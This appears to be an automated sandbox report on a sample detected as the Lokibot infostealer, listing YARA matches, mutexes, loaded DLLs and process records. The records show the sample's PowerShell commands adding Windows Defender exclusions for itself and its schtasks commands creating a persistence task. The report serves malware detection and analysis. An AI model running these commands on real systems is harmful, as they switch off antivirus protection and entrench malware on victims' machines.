Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: YvVDV4cbjy.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HxQXdrrQ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: HxQXdrrQ.exe, 0000000A.00000002.2108841411.0000000000B10000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Windows\system32\C:\Users\user\AppData\Roaming\HxQXdrrQ.exeC:\Users\user\AppData\Roaming\HxQXdrrQ.exeC:\Users\user\AppData\Roaming\HxQXdrrQ.exewinsta0\defaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows.VBp

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/17@0/1

Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Code function: 15_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

15_2_0040434D

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

File created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\cmeIbBONpPebqxDUn
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

File created: C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp

Jump to behavior

Source: YvVDV4cbjy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: YvVDV4cbjy.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: YvVDV4cbjy.exe	Virustotal: Detection: 74%
Source: YvVDV4cbjy.exe	ReversingLabs: Detection: 79%

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

File read: C:\Users\user\Desktop\YvVDV4cbjy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Process created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
